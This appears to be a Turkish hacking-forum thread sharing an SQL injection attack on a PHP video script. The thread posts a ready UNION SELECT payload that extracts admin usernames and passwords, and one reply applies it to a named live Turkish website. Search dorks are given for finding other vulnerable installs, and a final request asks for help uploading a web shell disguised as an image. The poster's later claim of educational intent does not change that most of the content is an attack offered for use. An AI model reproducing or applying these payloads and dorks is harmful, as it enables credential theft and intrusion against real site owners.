Tiffuny Scriptin Hacking Video Garanti Hacking

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Erkek

izle.gruplar.php?category=1+union+select+1,admin_id,admin_username,admin_password,5,6,7,8,9+from+joovili_admins

www.site.com/izle.gruplar.php?category=1+union+select+1,admin_id,admin_username,admin_password,5,6,7,8,9+from+joovili_admins

video: http://rapidshare.com/files/175168517/tifunnyfuck.rar

hacking taktigi sql injection var CookieHandling taktiklerini görüceksiniz hepinize bol sevişmeler

"Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Nitrous
    Nitrous's avatar
    Erkek

eline sağlık kanka:D  biz işimizi gördük kalanlarıda başkaları düzsün:D

live link isteyen olursa :D 

http://www.kahve.web.tr/izle.gruplar.php?category=1+union+select+1,admin_id,admin_username,admin_password,5,6,7,8,9+from+joovili_admins 

<< Nitrous@TahriBaT.com >>
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    opensource2009
    opensource2009's avatar
    Erkek
    Dork var mı :D
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Nitrous
    Nitrous's avatar
    Erkek

dork :  inurl://uye.katilim.php

inurl://duzenle.sifreyardim.php

<< Nitrous@TahriBaT.com >>
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Erkek
    bu yazılımı kullanıcak olan kişiler scripti incelemedim bile içinde ne dalavereler vardır kimbilir bu scripti benim yaptıgımı sanan arkadaşlarımız vardı yapımında ve yayınlanmasına hiçbir katkım yoktur video tamemen bilgilendirme diğer webmaster arkadaşlarımızın böyle basit hatalar düşmelerini önleme adına yapılmış bir video dur hackleme olayına gelince sıradan lamerler miror kasmak için heryeri hacklerler demo verdim site ne yazıkki türk sitesi yabancılar kullanıyor olsa bütün videolarımda yabacı siteler üzerinde gösterim yapıyorum bu yüzden o site admini arkadaştan özür dilerim.

"Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    karakas
    karakas's avatar
    Erkek

üstad shelli resim olarak yükleyemiyorum yardımcı labilirmisin?

Toplam Hit: 1779 Toplam Mesaj: 6